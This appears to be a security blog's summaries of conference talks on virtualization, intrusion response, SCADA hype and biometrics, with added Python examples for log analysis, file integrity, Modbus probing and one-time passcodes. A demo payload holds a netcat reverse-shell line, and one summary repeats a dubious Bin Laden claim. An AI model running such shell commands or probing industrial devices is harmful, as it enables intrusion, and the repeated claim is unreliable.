Cатсн²² (in)sесuяitу / ChrisJohnRiley

Because we're damned if we do, and we're damned if we don't!

Tag Archives: ninjacon

[Plumbercon/Ninjacon] Security in a changing world

Security in a changing world – bringing security-sense to virtualized desktop environments

Dror-John Roecher


Server virtualization has become commonplace and even security has picked up on the subject and established a common understanding of good security practice for virtualized server environments. But a new virtualization trend rises above the horizon – so called ‘Client’ or ‘Desktop’ virtualization. Whereas the scope of server virtualization was limited to the datacenter (and in some context stretched towards the location and ownership of the datacenters, e.g. in the context of cloud-based services), these new client computing approaches easily cross all existent logical and geographical boundaries within our computing environment. They enable a whole set of new services and delivery methods, flexibility in time, location, underlying hardware, operating system and presentation format. All these changes need to be addressed and constructively accompanied by security.

The presentation will detail concepts of client/desktop virtualization for security people, enabling them to understand what the technology does, how it does it and why businesses rush to introduce it. We will go on to discuss security of different solution architectures and establish some basic guidelines on choosing ‘the right stuff for the situation’. These two parts of the presentation serve as a foundation for an abstracted discussion on how to tackle the big changes from a security perspective. How is security changing, what are we doing wrong, what are we doing right and how should we change the way we look at and apply security. Let’s call this ‘change the spirit of security’.

Where does corporate IT stand today

Our wish is to use products in a secure way, align business and IT objectives, and have all of this transparent to the end-user, compliant, etc.

The reality however is very different. Many security staff see security as a value in itself. They have no link to business functions and no understanding of business needs.

Broken products, run by people without proper skill-sets, overburdened with too many tasks

Clinging to the “never change a running system” paradigm – a common excuse never to change, move, think or evolve

Computer budgets are out of control – value of security is not evident

CxO on IT:

  • Cheap to buy and operate
  • Needed for business, but no value in itself
  • Should be easily exchangeable
  • OPEX, not CAPEX

Users on IT:

  • Corporate-provided tools often unfit for the job
  • Wish for “freedom of tools”, “freedom of time and location”
  • Cisco Strategy: “Anytime, Anywhere, Anydevice, Anyapp, Anydata…” moving towards collaboration

Client Virtualization 101

At least 5 technologies…

  • Local OS Virtualization
    • The desktop OS runs as a virtualized guest on the local hardware
  • Remote OS Virtualization
    • Move the virtualized guest into the datacenter
  • Application Virtualization
    • Package sandboxed applications and remove the need for local installs
    • Restrict access from the application to the OS
    • Example: Microsoft Office 2010 Click-to-Run
  • User Profile Virtualization
    • Decouple all user settings from the OS
    • Lets users move easily between systems and keep the same environment
  • Presentation Virtualization
    • Run everything remotely and give the remote user access to it
    • Example: Citrix

Remote OS Virtualization

Pros & Cons

  • + Clients are always accessible for IT-Staff
  • + Performance on demand
  • – Storage needs

Security architecture depends on the protocol used (PCoIP, RDP, RGS)

Threat and vulnerability analysis –> difficult and complex because of the architecture; the outcome is questionable

Vendors are quick to respond that their solutions are secure, yet even they fail to understand the real risks (example: use of SSL/TLS without knowing who validates whom… client, server, both?)

Adapt to a changing world

Risk has failed us – what we are used to is trust

Risk analysis has mostly failed –> even in finance, where they have plenty of statistical data

  • The question boils down to: do you trust the technology? The provider? The source of the information?

Our security concepts are based on location. With Client Virtualization, the clients are in motion. This creates a new set of problems!

Replace location-based security with content-based security

Replace prohibition with enablement

  • Blocking access to things like Skype or ICQ doesn’t solve the problem
  • Enable employees to use them in a secure way and within the company policies

Replace band-aids with root-cause treatment

  • Many systems, such as Application Firewalls, NAC, etc.. are band-aid solutions
  • Implement long-term solutions such as Secure Application Development, Innate data integrity, …

Fight operational stupidity

  • A single employee responsible for high-end, high-cost systems
  • Separation of duties… A and B must both check…. but A stands in for B while B is on holiday, and vice versa!

Less is more – Focus on the basics and do this right! –> don’t build the Winchester House of Security!

Accept that business will always break security

  • If there’s a good business reason, the business will do it regardless of security
    • Security can’t just say no…. it has to provide solutions

Start embracing change

  • Change is an opportunity
  • Embrace change, by starting to change your mind-set about change

Links :


  • Plumbercon/Ninjacon Synopsis –> http://plumbercon.org/schedule/58
  • [Plumbercon/Ninjacon] Invasion!


    Fish AKA Barry van Kampen


    It is 04:30 AM, you are awakened by a text message, and your friendly IDS is telling you a bunch of disallowed systems are trying to connect to the internet. Within a few seconds you’re awake, adrenaline pumping through your body; the disallowed connections aren’t usual warnings like the truckload of false positives you handled yesterday. Apparently, the alerts were not so ‘false’ after all. It’s going to be a long, long day…

    Intrusion is one of the first phases of a so-called network invasion; this story tells you what could happen after the first intrusion, what you could do, and what you shouldn’t do.

    —- —- —- —- —-

    Everywhere you go there are hacks, and everybody gets hacked eventually.

    Invasion is a step beyond being hacked.

    The information your company holds could be stolen and sold.

    WTF is network Invasion?

    Who’s invading

    • Hackers & crackers (hackers aren’t the bad guys)
    • Organized crime
    • People who can make money from it

    How to get invaded

    • An initial hack is made
    • A first system is owned
    • Level 2 attack
      • Further exploitation
    • Pivot into the internal network
    • Set up communications
      • To transport information out
    • Maintain access
      • Wait for the good info, then sell it, use it, …

    Ways to get invaded

    • Zero days
    • Targeted attacks
    • Printers
      • Multi-function devices
    • Insecure wireless
    • Wardialing – Modem access
    • Custom/Prepped Hardware
      • Certified pre-owned

    Not all attacks have to be bleeding edge or highly technical… old modem attacks, physical access, and social engineering do it just as well.

    Maintaining access –> custom or purpose written malware/trojans. Custom written code is worth the investment if an attacker can make money from the attack.


    • Patch Management / LCM
    • Faulty code
      • Application vulnerabilities
      • SQL injection, etc.
    • Human Error
      • Configuration issues
    • Response
      • IDS False Positives
      • Real attacks can get lost in amongst a flood of False Positives
    • It can start at home!
      • Password stealing
      • See recent Facebook attack


    • Strange patterns
      • Many companies have logs and monitoring, but fail to do full analysis
      • Not much trend analysis
    • System Maintenance
      • Log checking –> People don’t check their logs enough
      • SSH brute-force on your external IP is to be expected
      • SSH brute-force on your internal network is bad!
    • IDSs are providing alerts
      • Mixed amongst other false positives
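    The “SSH brute-force on your external IP is expected, on your internal network it is bad” point is a detection rule that is easy to encode, and it is the kind of trend analysis the talk says most companies skip. The Python below is an added example and is not part of Fish’s talk or the original post. It parses constructed sshd auth-log lines (the hostnames, addresses and timestamps are made up), counts failed logins per source, flags any source inside the internal ranges as critical, and also flags a source whose login succeeded after a run of failures, which is what a password-guessing attacker looks like when they win. The internal address ranges and the failure threshold are assumptions to be adapted to your own network.

```python
import ipaddress
import re
from collections import Counter, defaultdict

# Constructed sample of sshd auth-log lines (not real logs). 203.0.113.0/24 is a
# documentation range standing in for "somewhere on the Internet".
SAMPLE_LOG = """\
Jun 12 04:31:07 web01 sshd[2201]: Failed password for root from 203.0.113.45 port 51234 ssh2
Jun 12 04:31:09 web01 sshd[2201]: Failed password for root from 203.0.113.45 port 51236 ssh2
Jun 12 04:31:11 web01 sshd[2203]: Failed password for admin from 203.0.113.45 port 51240 ssh2
Jun 12 04:31:13 web01 sshd[2205]: Failed password for invalid user oracle from 203.0.113.45 port 51244 ssh2
Jun 12 04:32:40 web01 sshd[2260]: Accepted publickey for deploy from 10.0.1.15 port 40022 ssh2
Jun 12 04:35:02 db01 sshd[3310]: Failed password for root from 10.0.5.23 port 33001 ssh2
Jun 12 04:35:03 db01 sshd[3310]: Failed password for root from 10.0.5.23 port 33002 ssh2
Jun 12 04:35:04 db01 sshd[3311]: Failed password for postgres from 10.0.5.23 port 33003 ssh2
Jun 12 04:35:05 db01 sshd[3311]: Failed password for backup from 10.0.5.23 port 33004 ssh2
Jun 12 04:35:09 db01 sshd[3312]: Accepted password for backup from 10.0.5.23 port 33005 ssh2
"""

# Assumption: these are "our" internal ranges (RFC 1918); adapt to the real address plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

FAILED_RE = re.compile(
    r"(?P<host>\S+) sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+")
ACCEPTED_RE = re.compile(
    r"(?P<host>\S+) sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<ip>[\d.]+) port \d+")


def parse_events(log_text):
    """Yield (kind, host, user, source_ip) for each sshd auth event; other lines are ignored."""
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            yield "failed", m["host"], m["user"], m["ip"]
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            yield "accepted", m["host"], m["user"], m["ip"]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def analyse(log_text, threshold=3):
    """Return one alert per suspicious source, most severe first."""
    failures = Counter()
    users = defaultdict(set)
    hosts = defaultdict(set)
    success_after_failures = set()
    for kind, host, user, ip in parse_events(log_text):
        if kind == "failed":
            failures[ip] += 1
            users[ip].add(user)
            hosts[ip].add(host)
        elif failures[ip]:  # a login succeeded from a source that was guessing just before
            success_after_failures.add(ip)

    alerts = []
    for ip, count in failures.items():
        won = ip in success_after_failures
        if count < threshold and not won:
            continue
        internal = is_internal(ip)
        # External guessing is background noise (still worth a counter); internal
        # guessing means something inside already belongs to the attacker, and a
        # success after guessing is an account compromise wherever it came from.
        severity = "critical" if internal or won else "expected"
        alerts.append({
            "source": ip,
            "zone": "internal" if internal else "external",
            "failures": count,
            "targets": sorted(hosts[ip]),
            "users": sorted(users[ip]),
            "success_after_failures": won,
            "severity": severity,
        })
    return sorted(alerts, key=lambda a: (a["severity"] != "critical", a["source"]))


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

    Run against the sample, the external guessing from 203.0.113.45 is reported as “expected” noise, while 10.0.5.23 comes out on top as “critical”: it is an internal address, it cycled through several accounts, and the last attempt succeeded. That second alert is the one that should wake somebody up, and it is exactly what gets lost when both are just two more lines in the false-positive flood.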

    Incident Response

    Gathering information from different sources can be a problem. Communication is key, but you don’t know which communication channels are still secure.

    If the team is too large, somebody in the loop may also be involved in the attack. Keep things on a need-to-know basis. Give a heads-up to other teams, but don’t provide more information than is required to achieve the task.

    What to do?

    Response based actions

    • Find the source and method of attack, monitor, block, fix
      • Check network traffic
      • Use Anti-malware software
        • Won’t help against custom malware
      • Apply software control
        • White-lists
        • Information flows

    The Big Search

    • Search for changes on the network
      • Check file systems
      • File integrity
        • Must have hashes of known good files
        • Do comparison using trusted binary
      • Blacklist checks
      • Whitelist checks
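    The “Big Search” above, together with the software-control point (whitelists, blacklists), is a host integrity check: hash what is on disk, compare against hashes of known-good files, and look for hashes of known-bad ones. The Python below is an added example and not from the talk or the original post. It builds a baseline of SHA-256 hashes over a directory tree, later compares the live tree against that baseline (the whitelist) and a set of known-bad hashes (the blacklist), and reports modified, added, removed and known-bad files. The directory and its contents are constructed inside a temporary directory; the file names and the “dropper” payload are made up. The talk’s caveat applies unchanged: keep the baseline off the host and run the comparison from a trusted interpreter and libraries, otherwise a rootkit can feed the checker whatever it likes.

```python
import hashlib
import os
import tempfile


def sha256_file(path, chunk_size=1 << 16):
    """SHA-256 of a file, streamed so large binaries do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def build_baseline(root):
    """Map every regular file below root (relative, POSIX-style path) to its SHA-256.
    Symlinks are skipped on purpose: hashing the target would hide a link that was re-pointed."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def compare(baseline, root, known_bad=frozenset()):
    """Diff the live tree under root against a baseline taken earlier.
    baseline  : dict path -> sha256 hex digest (the whitelist of known-good files)
    known_bad : set of sha256 hex digests of known-malicious files (the blacklist)
    """
    current = build_baseline(root)
    return {
        "modified": sorted(p for p, h in current.items() if p in baseline and baseline[p] != h),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
        "known_bad": sorted(p for p, h in current.items() if h in known_bad),
    }


def _write(root, rel, data):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as fh:
        fh.write(data)


def demo():
    """Constructed scenario: take a baseline, simulate an intrusion, run the comparison."""
    payload = b"#!/bin/sh\nexec nc -e /bin/sh 203.0.113.9 4444\n"  # constructed 'dropper' content
    blacklist = {hashlib.sha256(payload).hexdigest()}           # its hash, as a blacklist entry
    with tempfile.TemporaryDirectory() as root:
        _write(root, "bin/sshd", b"ELF original sshd")
        _write(root, "etc/passwd", b"root:x:0:0::/root:/bin/sh\n")
        _write(root, "etc/motd", b"welcome\n")
        baseline = build_baseline(root)          # in practice: sign it and store it off-host

        _write(root, "bin/sshd", b"ELF trojaned sshd")                 # replaced binary
        _write(root, "etc/passwd", b"root:x:0:0::/root:/bin/sh\nbackdoor:x:0:0::/:/bin/sh\n")
        _write(root, "tmp/.x/dropper", payload)                        # new file with a known-bad hash
        os.remove(os.path.join(root, "etc", "motd"))                   # deleted file
        return compare(baseline, root, known_bad=blacklist)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

    The whitelist side (“is every file still what it was?”) catches the trojaned sshd and the extra root account even though no signature exists for them; the blacklist side only fires on the dropper because its hash happens to be known. That asymmetry is why the talk puts the known-good baseline first and anti-malware second.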

    Full Reinstall

    • Reinstall it all!
      • Not practical
    • Risk reduction
    • Have to be sure you solved the issue
      • Is the invasion gone
      • Is the flaw fixed

    Being pro-active = being prepared

    Incident response policy should be in place

    • A team with gurus
    • Mandate to do what is required
    • External contracts / contacts
      • Ability and permission to reach out to trusted 3rd parties
    • IR is the first part of forensics
    • Legal!
      • Be sure of legal issues
      • Speak to legal department if you have one

    To be more pro-active

    • Vuln assessments and audits
    • Check and double check patch management
    • Change management
    • Monitoring and followup

    Improve architecture to reduce risk

    • Multiple firewalls, from different vendors
    • IDS monitoring
    • WAF
    • Monitoring of load on servers and networks

    Goal here is to make it hard to get through to the soft core.


    A good source of information on who’s attacking you, but not legal in all countries (can be seen as tempting attackers).

    Links :


    [Plumbercon/Ninjacon] Breaking news: Cyber attack started Eyjafjallajökull volcano eruption

    Breaking news: Cyber attack started Eyjafjallajökull volcano eruption

    Anchises de Paula


    ‘We know that cyber intruders have probed SCADA systems, and that in other countries cyber attacks have started volcano eruptions. Several prominent intelligence sources confirmed that a cyber attack in Iceland in April 2010 affected several European countries and hundreds of thousands of people. The Icelandic Meteorological Office had several plants knocked offline, which indicates that the cyber incident is connected to the explosive activity from the Eyjafjallajökull volcano. It is not clear who did it or what the motive was.’

    Calm down, the story above is not true, as far as I know. Actually, I just created it by copying and pasting text from a major US news program’s story on cyber war and system sabotage. There is a lot of FUD, paranoia and an obscure political agenda behind the recent news about hackers’ capabilities to attack SCADA Systems and disrupt critical infrastructures. Are hackers able to blackout a country, to destroy an oil platform, to disrupt Wall Street, or to lead a volcano to eruption?

    We have seen plenty of rumors about cyber attacks against the nation’s critical infrastructures, including security vulnerabilities in the power grid control systems (the ones that run dams, power plants, transmission lines and more). Some security professionals are highly skeptical about the claims, raising questions about the veracity of the penetration of industrial systems by criminals, while several sources from the government and the industry keep mentioning this story, over and over.

    In this presentation, Anchises will discuss the misinformation, disinformation and myths that support such cyber Armageddon theories and stories. He will elaborate on the technical feasibility of such threats, the political agenda and the press agencies’ trustworthiness. In addition, he will present a review of the press stories about SCADA attacks and discuss the real feasibility of them. Are these stories real, lies, or exaggeration? What is the likelihood of each of them? The truth is out there and we will find it.

    <FUD>Volcano Hacking</FUD>

    The press are currently so hungry for SCADA and cyber-attack stories that they would accept almost anything as a cyber attack.

    The Volcano eruption would be a perfect terrorist attack. Disruption, Cost, Fear.

    How could you achieve this….

    Simple: the sensors that monitor volcanoes are network-connected. Attack these to show false readings, cause pulses, etc.

    STOP –> This is stupid… it’s FUD

    Some people do believe such things are possible, however –> US Military behind Haiti quake, says Innsbruck scientist (see links)

    60 Minutes also claimed that the Brazilian blackouts of 2005/2007 were caused by hackers. It was later found that sooty insulators caused the blackouts… not hackers. Then again, sooty insulators don’t make news!

    Many SCADA systems are old, just like the systems in Brazil. Naturally things go wrong, and when they fail, people start to think it’s hackers instead of looking at the obvious first.

    News even surfaced that the BP disaster could be a Cyber Attack (see links)

    Other information points to faulty sensors (deactivated and not replaced)

    People believe anything the press say…

    • Few reports with technology background
    • The press want to sell newspapers/viewers
    • The press hype threats… more interesting than other stories

    Cyber Armageddon stories

    Fact: SCADA systems are vulnerable

    • Software, hardware, architecture
      • Old technologies: old bugs
      • New technologies: TCP/IP, Internet connectivity

    Bad combination! Old bugs, easily accessible!

    Airgaps are disappearing as SCADA needs to send data to other systems

    Tools for testing SCADA

    • ModScan –> SCADA MODBUS Network Scanner
    • SHODAN
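    ModScan-style discovery works because Modbus/TCP has no authentication at all: a device that answers a read request with anything well-formed (a register dump or even a protocol exception) has just identified itself, and the same unauthenticated path accepts writes. The Python below is an added example, not code from the talk, from ModScan or from the original post. It encodes a Modbus/TCP “Read Holding Registers” request (function code 3), decodes the reply, and applies the scanner heuristic. The sample replies are constructed byte strings, not captures from any device; the code only builds and parses frames and never opens a socket, so it runs offline.

```python
import struct

READ_HOLDING_REGISTERS = 0x03
EXCEPTION_NAMES = {
    0x01: "ILLEGAL FUNCTION",
    0x02: "ILLEGAL DATA ADDRESS",
    0x03: "ILLEGAL DATA VALUE",
    0x04: "SLAVE DEVICE FAILURE",
}


def build_read_holding_registers(transaction_id, unit_id, start_addr, quantity):
    """Encode a Modbus/TCP Read Holding Registers (function code 3) request.

    Frame = MBAP header + PDU. MBAP: transaction id, protocol id (0 = Modbus),
    length of everything after the length field, unit id. There is no field for
    authentication anywhere: whoever can reach TCP/502 can read (and, with FC 6/16, write).
    """
    if not 1 <= quantity <= 125:
        raise ValueError("FC 3 allows 1..125 registers per request")
    pdu = struct.pack(">BHH", READ_HOLDING_REGISTERS, start_addr, quantity)
    mbap = struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id)
    return mbap + pdu


def parse_response(frame):
    """Decode a reply to FC 3 into a dict, distinguishing register data from a Modbus exception."""
    if len(frame) < 8:
        raise ValueError("shorter than MBAP header plus function code")
    transaction_id, protocol_id, length, unit_id = struct.unpack(">HHHB", frame[:7])
    if protocol_id != 0:
        raise ValueError("protocol id is not 0 (not Modbus)")
    if length != len(frame) - 6:
        raise ValueError("MBAP length field does not match the frame")
    if len(frame) < 9:
        raise ValueError("nothing after the function code")
    function_code = frame[7]
    if function_code & 0x80:                      # exception response: FC | 0x80, then exception code
        code = frame[8]
        return {"transaction_id": transaction_id, "unit": unit_id,
                "exception": EXCEPTION_NAMES.get(code, "UNKNOWN 0x%02x" % code)}
    if function_code != READ_HOLDING_REGISTERS:
        raise ValueError("unexpected function code %d" % function_code)
    byte_count = frame[8]
    data = frame[9:9 + byte_count]
    if len(data) != byte_count or byte_count % 2:
        raise ValueError("register data truncated or not a multiple of 2 bytes")
    registers = list(struct.unpack(">%dH" % (byte_count // 2), data))
    return {"transaction_id": transaction_id, "unit": unit_id, "registers": registers}


def looks_like_modbus(reply, expected_transaction_id):
    """Scanner heuristic (the ModScan idea): a well-formed reply that echoes our transaction id,
    even if it is only an exception, means a Modbus/TCP service is listening on that port."""
    try:
        return parse_response(reply)["transaction_id"] == expected_transaction_id
    except ValueError:
        return False


# Constructed sample replies (not captured from any real device).
SAMPLE_DATA_REPLY = bytes.fromhex("0001 0000 0007 01 03 04 000a 01f4")  # unit 1, registers [10, 500]
SAMPLE_EXCEPTION_REPLY = bytes.fromhex("0002 0000 0003 01 83 02")        # FC 3 | 0x80, ILLEGAL DATA ADDRESS
NOT_MODBUS = b"HTTP/1.1 400 Bad Request\r\n"                            # some other service on the port

if __name__ == "__main__":
    print(build_read_holding_registers(1, 1, 0, 2).hex())
    print(parse_response(SAMPLE_DATA_REPLY))
    print(parse_response(SAMPLE_EXCEPTION_REPLY))
    print(looks_like_modbus(NOT_MODBUS, 1))
```

    The exception reply is the instructive case: a device that answers “ILLEGAL DATA ADDRESS” has told the scanner that it speaks Modbus, which unit id answered, and that it will process whatever function codes it does support, with nothing in the frame to say who asked. That, combined with the disappearing air gaps mentioned above, is why SHODAN-style searches for these devices are productive.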

    SCADA incidents

    1999: Russia – Malicious crackers took control of a gas pipeline

    2001: Australia – A disgruntled ex-employee hacked into the water control system and caused millions of liters of raw sewage to spill out

    2003: US – Slammer worm affected the corporate network at a nuclear plant and disabled a safety monitoring system

    2007: US – Aurora Generator Test –> Test in a controlled environment

    2007: US – Operators manually shut down a nuclear reactor after two water pumps’ controllers locked up following a spike in data traffic

    2008: Ireland – SCADA system at Dublin Port Tunnel collapsed

    2009: US – Human error shutting down cooling system

    2009: US – an IT consultant tampered with a SCADA system from an oil and gas corporation

    2010: US – Computer failure interrupts flow from a city plant

    Perfect FUD

    Press are over-hyping things

    It’s not possible to prove or disprove. Therefore it can be blamed on anybody, from hackers to cyber attacks by foreign nations.

    Before the press started talking about SCADA, nobody was looking at them. Since then, hackers are looking for them and researchers are testing them.

    Self-fulfilling prophecy?


    Response from a Journalist: Press are starved of real technical assistance. Most news stories come from press-releases and are hard to double-check. A lot of press do simple copy & paste from AP articles. Deadlines restrict what a journalist can really do to confirm things, especially with highly technical content.

    Response from Anchises de Paula: Press is no longer a one-way process. Readers can feed back to the journalists. However, if people see enough of a story, it becomes true. Journalists cite other journalists as sources. Journalists often have a story, and even when talking to a technical source, they pick and choose the one-line quotes to make their point, and not convey the whole story.

    Links :

    • Plumbercon/Ninjacon Synopsis –> http://plumbercon.org/schedule/51
    • Anchises de Paula Twitter –> http://twitter.com/anchisesbr
    • Haiti earthquake conspiracy –> LINK
    • US Military behind Haiti quake, says Innsbruck scientist –> LINK
    • Report: Cyber Attacks Caused Power Outages in Brazil –> LINK
    • Brazilian Blackout Traced to Sooty Insulators, Not Hackers –> LINK
    • Oil Spill, Accident or Cyber Attack –> LINK
    • ModScan: A SCADA MODBUS Network Scanner –> LINK


    [Plumbercon/Ninjacon] Biometrics, the weapon for the ‘New War’

    Biometrics, the weapon for the ‘New War’

    Mark Tuttle


    In February 2010, the DNI (Director of National Intelligence) presented the annual ‘National Threat Assessment’ report to Congress. Cyber threats are number one this year, displacing the dominance of terrorism. Creating a war against something of concern is nothing new – we have had other wars, wars on drugs, wars on terror that arguably didn’t require a war effort, but it is the way to build a large momentum against a threat – imagined or real. Cyber crime and the cyber threat to national online infrastructure is the new war. This ‘war’ will yield major amounts of money to secure the Internet, and the critical connected infrastructure. It also will likely not truly solve the core problem with all systems, the lack of strong identity.

    When the authorities and bureaucrats realize that strong identity is at the core of many problems, we can look forward to the government creating a national strong identity platform initiative. If we are lucky, it will be pretty good; if we are not, it will mean a complex system that no doubt will impinge on our personal privacy and rights. One thing is clear though: that biometrics will be at the center of the system. President Obama has created a Cyber Security Czar position to address this problem, a chief technology officer for the Internet, and he has activated programs for research, development and deployment of new technologies to address the problems. Some estimates put spending at 5 Billion USD per year to solve this problem.

    In this presentation, we will examine the change in awareness, look at the current state of biometrics, and cover a new architectural paper on securing transactions over an insecure Internet; delivered by Dr. Michael Fiske to the DOD and NSA (IMPC 2009 Miami) addressing this topic. On a lighter note, Mark will also cover Dr. Lee Haddad’s paper on the reported Gummy Bear attack against biometric finger print security systems.

    What’s the new war?

    DNI – 2010 Annual Threat Report

    – Initial 2.5 pages discuss critical infrastructure protections (Cyber threats)

    This is a break from the norm, where the key focus and initial discussion has been on domestic Terrorism.

    Professor Leo Strauss said :

    • America will disintegrate into ruin because of individual self interests
    • America needs to have a special place in the world… the protector of the freedom to make right the wrongs – in order to prevent this
    • Because of this need: it is ok to exaggerate or create an enemy if one is not actually present

    Critical infrastructure – Cyber attack is a real enemy and perhaps ex-CIA operative Osama Bin Laden and his terrorism is not… (source: “The Power of Nightmares”, BBC, Adam Curtis)

    Critical infrastructure – SCADA

    • Acknowledged compromises (many on Google)
      • Nuclear power plant safety system –> down for 5 hours
      • Pipeline –> leading to release of materials
      • Oil platform –> disgruntled employee

    BP Oil Spill

    Accident or Cyber Attack?

    • Article alludes to North Korea being behind the attack (circumstantially)
    • Deepwater Horizon oil platform was built and financed by South Korea

    Lack of integrity and protection in SCADA leaves them open to attack. Very little hard evidence is available because the oil rig was destroyed.

    Weak Identity and Compromise

    Do most identity systems confirm the actual user –> No

    PKI cards only identify the card; there is no direct link leading back to the user. Gap in the identity chain.


    Top 10 requirements to solve these issues (coming from IPMC 2009 talk by Dr. Michael Fiske)

    The host computer and network cannot be trusted. The ecosystem must be divided into trusted and untrusted parts. An operation not run in a trusted environment must be handled as a secure transaction. Authentication and authorization from an untrusted device are not secure.

    A new notion, a secure module is required. Given that the host network cannot be trusted, it follows that something new needs to be used.

    This new module must focus on :

    • Availability
    • Authentication
    • Integrity
    • Confidentiality
    • Authorization
    • Accountability

    Authentication must be decentralized while authorization operations must be centralized.

    All authentication data must be stored only in the secure module. If the module is tampered with, the contents should be destroyed to protect integrity.

    All authentication factors (PIN, Password, Biometrics) have to be entered directly into the module. The only output is a dynamic token in the form of a one-time-passcode.

    Module Demonstration –> demo of a working module (at 17:00)
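    The module’s contract above (factors go in, the secret never comes out, the only output is a one-time passcode, a tamper event wipes the secret) and the split between decentralized authentication and centralized authorization can be modelled in a few lines. The Python below is an added example and is not the code of Dr. Fiske’s module or anything from the talk: the talk does not say which algorithm produces the dynamic token, so this example assumes HOTP (RFC 4226, HMAC-SHA-1 over a counter) as the one-time passcode, and the PIN check, the window size and the class names are likewise assumptions. The shared secret used below is the RFC 4226 test-vector key, chosen so the expected codes are known; a real module would generate and keep its own.

```python
import hashlib
import hmac
import struct


def hotp(secret, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA-1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


class SecureModule:
    """The talk's module reduced to its contract: factors go in, only a one-time code comes out.
    The secret is never returned, and tamper() wipes it (a real module does this in hardware)."""

    def __init__(self, secret, pin):
        self._secret = bytes(secret)
        self._pin = pin            # assumption: a PIN stands in for the entered factor(s)
        self._counter = 0

    def generate(self, pin):
        if self._secret is None:
            raise RuntimeError("module zeroised after tamper event")
        # The factor is checked inside the module; the host never sees the PIN or the secret.
        if not hmac.compare_digest(pin.encode(), self._pin.encode()):
            raise PermissionError("wrong PIN")
        code = hotp(self._secret, self._counter)
        self._counter += 1         # every code is used once; the counter never goes back
        return code

    def tamper(self):
        self._secret = None        # "if the module is tampered with, the contents are destroyed"


class CentralVerifier:
    """Centralized authorization side: shares the secret, remembers the last accepted counter,
    accepts a code only ahead of that counter (inside a small look-ahead window) and never twice."""

    def __init__(self, secret, window=5):
        self._secret = bytes(secret)
        self._window = window
        self._last_counter = -1

    def verify(self, code):
        for counter in range(self._last_counter + 1, self._last_counter + 1 + self._window):
            if hmac.compare_digest(hotp(self._secret, counter), code):
                self._last_counter = counter   # consumes this counter and every earlier one
                return True
        return False


if __name__ == "__main__":
    shared = b"12345678901234567890"          # RFC 4226 test-vector key (demo only)
    module, verifier = SecureModule(shared, "4711"), CentralVerifier(shared)
    token = module.generate("4711")
    print(token, verifier.verify(token), verifier.verify(token))   # second check is a replay
```

    Two properties matter for the threat model the talk describes. First, the host between module and verifier only ever carries the six-digit token, so an untrusted host can relay or steal it but cannot mint the next one. Second, the verifier moves its counter forward on every accepted code, so a stolen token is worthless once used and a token skipped on the module (generated but never sent) is still accepted as long as it falls within the window.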

    Links :